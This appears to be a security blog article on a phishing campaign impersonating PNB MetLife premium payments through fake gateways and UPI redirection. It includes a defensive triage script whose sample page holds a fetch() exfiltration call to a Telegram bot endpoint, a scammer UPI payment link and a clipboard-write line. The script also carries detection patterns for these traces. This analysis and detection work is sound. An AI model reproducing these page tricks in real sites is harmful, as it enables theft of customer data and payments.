A recently uncovered phishing campaign targeting PNB MetLife insurance customers shows how far financial fraud has evolved. What looks like a simple premium payment reminder can quickly turn into a real-money loss using legitimate UPI apps many of us trust every day.

Overview of the Phishing Campaign

This campaign impersonates PNB MetLife's premium payment system. Victims are led to fake payment gateways that closely resemble legitimate insurance portals.

Unlike traditional phishing attacks that aim only to steal credentials, this operation follows a multi-stage approach:

  1. Collect personal details
  2. Build trust through a realistic payment flow
  3. Redirect victims to real UPI apps
  4. In advanced cases, harvest full banking credentials

This layered design makes the attack both effective and difficult to detect early.

How Victims Are Lured In

The attack usually begins with a simple SMS message.

These messages appear transactional rather than alarming. Common themes include:

  • Premium payment pending
  • Policy update required
  • Refund or adjustment notification

The language is calm but time-sensitive, encouraging users to "complete payment" or "resolve the issue" through a provided link.

While SMS is the primary channel, similar links may also circulate through email or social media platforms, increasing exposure.

The Fake PNB MetLife Payment Gateway

Clicking the link opens a professionally designed, mobile-friendly payment page. At first glance, nothing feels wrong: the layout is clean, the branding looks familiar, and the flow resembles genuine insurance payment portals.

The page asks for:

  • Name
  • Policy number
  • Mobile number

Here's the critical detail: there is no backend verification.

Any value entered is accepted. This is deliberate. Validation failures could raise suspicion, while smooth acceptance keeps the victim moving forward with confidence.

Figure: Fake PNB MetLife Payment Gateway [Source: Malwr-Analysis]

Stealthy Data Exfiltration in the Background

While the victim sees a normal form submission, something else is happening silently.

The entered details are instantly transmitted to attackers using Telegram's Bot API. Instead of reaching a payment processor or insurance backend, the data is routed to attacker-controlled Telegram channels.

Information collected at this stage includes:

  • Personal identifiers
  • Policy details
  • Contact information

Telegram is attractive to attackers because it offers speed, automation and relative anonymity, all without complex infrastructure.

Manipulating the Payment Flow

Once initial details are captured, the page advances to a payment step.

Victims are asked to:

  • Enter a payment amount
  • Proceed to finalize the transaction

Again, no policy validation occurs. Any amount is accepted and logged.

This gradual progression is intentional. Each step feels legitimate on its own, but together they guide the victim toward a fraudulent outcome without triggering alarm.

The UPI Redirection Trap

This is where the attack becomes especially effective. Instead of routing payments through fake processors, the scam leverages real UPI applications, including:

  • PhonePe
  • Paytm
  • Google Pay

The phishing page dynamically generates a UPI payment request and presents it as:

  • A QR code
  • App-specific payment buttons

Because the payment happens inside a genuine app, many users assume it must be safe. Unfortunately, the funds are sent directly to attacker-controlled UPI IDs.

Figure: UPI payment redirection page with QR code [Source: Malwr-Analysis]

Clipboard Abuse

Some variants include an additional layer of deception. When a user clicks a payment app button, the site silently copies the attacker's UPI ID to the device clipboard before redirecting to the UPI app.

Even if the victim ignores the QR code, the fraudulent payment details are already prepared, increasing the likelihood of a successful transaction. It's subtle, efficient and difficult for most users to notice.
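The three page-side behaviours described above (Telegram Bot API exfiltration, dynamically generated UPI payment links, and clipboard writes) all leave recognizable traces in a saved copy of the phishing page. The following triage script is an added example, not code from the original analysis or from Malwr-Analysis: it scans constructed HTML fragments for those traces and parses any `upi://pay` link to extract the payee VPA so it can be compared against an allowlist of known-good merchant VPAs. The token, VPA and allowlist values are placeholders.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample of what an analyst might find in the saved source of a page like
# the one described. Token and VPA are placeholders; the fragments are not a working page.
SAMPLE_PAGE = """
<form id="pay"><input name="policy"><input name="mobile"></form>
<script>
fetch("https://api.telegram.org/botEXAMPLE_TOKEN_PLACEHOLDER/sendMessage", {method: "POST"});
</script>
<a href="upi://pay?pa=scammer@examplebank&pn=PNB%20MetLife&am=4999&cu=INR">Pay with PhonePe</a>
<button onclick="navigator.clipboard.writeText('scammer@examplebank')">Paytm</button>
"""

# Telegram Bot API calls have a fixed shape: /bot<token>/<method>; capture the method.
TELEGRAM_BOT_RE = re.compile(r"https://api\.telegram\.org/bot[^/\s\"']+/(\w+)")
# UPI deep links as used by PhonePe, Paytm and Google Pay intents.
UPI_LINK_RE = re.compile(r"upi://pay\?[^\s\"'<>]+")
# Browser clipboard writes (modern API and the legacy execCommand fallback).
CLIPBOARD_RE = re.compile(r"navigator\.clipboard\.writeText|document\.execCommand\(['\"]copy")


def parse_upi_link(link):
    """Return payee VPA (pa), display name (pn), amount (am) and currency (cu) of a upi://pay link."""
    qs = parse_qs(urlparse(link).query)
    return {k: qs.get(k, [None])[0] for k in ("pa", "pn", "am", "cu")}


def triage_page(html, allowed_payees):
    """Return (finding_type, detail) tuples for indicators found in the page source."""
    findings = []
    for m in TELEGRAM_BOT_RE.finditer(html):
        findings.append(("telegram_bot_api", m.group(1)))
    for link in UPI_LINK_RE.findall(html):
        fields = parse_upi_link(link)
        vpa = (fields["pa"] or "").lower()
        # A payee VPA that is not on the insurer's known merchant list is the core red flag,
        # regardless of what the display name (pn) claims.
        if vpa not in {p.lower() for p in allowed_payees}:
            findings.append(("unexpected_upi_payee", f"{vpa} (pn={fields['pn']}, am={fields['am']})"))
    if CLIPBOARD_RE.search(html):
        findings.append(("clipboard_write", None))
    return findings


if __name__ == "__main__":
    for kind, detail in triage_page(SAMPLE_PAGE, {"merchant.placeholder@examplebank"}):
        print(kind, detail or "")
```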

Beyond Payment Fraud

More sophisticated versions of this campaign go further. Victims may see options such as:

  • Update Amount
  • Refund Your Amount
  • Add AutoDebit System

Selecting these paths eventually leads to pages requesting:

  • Bank account numbers
  • Debit card details
  • Expiry dates and CVV codes

At this point, the operation shifts from payment fraud to full-scale financial identity theft, with all data still being exfiltrated through Telegram.

Infrastructure Behind the Scam

Threat research shows that attackers host these fake pages on free hosting platforms, allowing them to:

  • Deploy quickly
  • Rotate domains frequently
  • Minimize operational costs

Multiple Telegram bots and operator accounts coordinate the data collection and monitoring, reflecting a level of organization rather than opportunistic fraud.

Why This Campaign Is Dangerous

Several factors make this threat stand out:

  • It exploits trust in a well-known insurance brand
  • It avoids obvious errors that usually expose phishing
  • It uses legitimate UPI apps instead of fake ones
  • It combines data theft, payment fraud, and credential harvesting
  • It relies on psychological pacing rather than fear-based pressure

The result is a scam that feels routine until real money is lost.

How Users Can Protect Themselves

A few practical habits can significantly reduce risk:

  • Avoid payment links received via SMS
  • Access insurance portals only through official apps or saved bookmarks
  • Be cautious of payment pages that accept any input without validation
  • Never share card or bank details on ad-hoc payment pages
  • Pause when urgency feels artificial

A moment of verification can prevent long-term damage.

Conclusion

This campaign is a reminder that modern fraud doesn't rely on fear alone. It relies on familiarity, convenience and trust.

As digital payments become smoother, scams will continue to blend into everyday experiences. Awareness is the best defense.

Reference article: https://malwr-analysis.com/2026/01/21/fake-pnb-metlife-payment-gateway-page-stealing-customer-details-and-redirecting-victims-to-upi-payments/
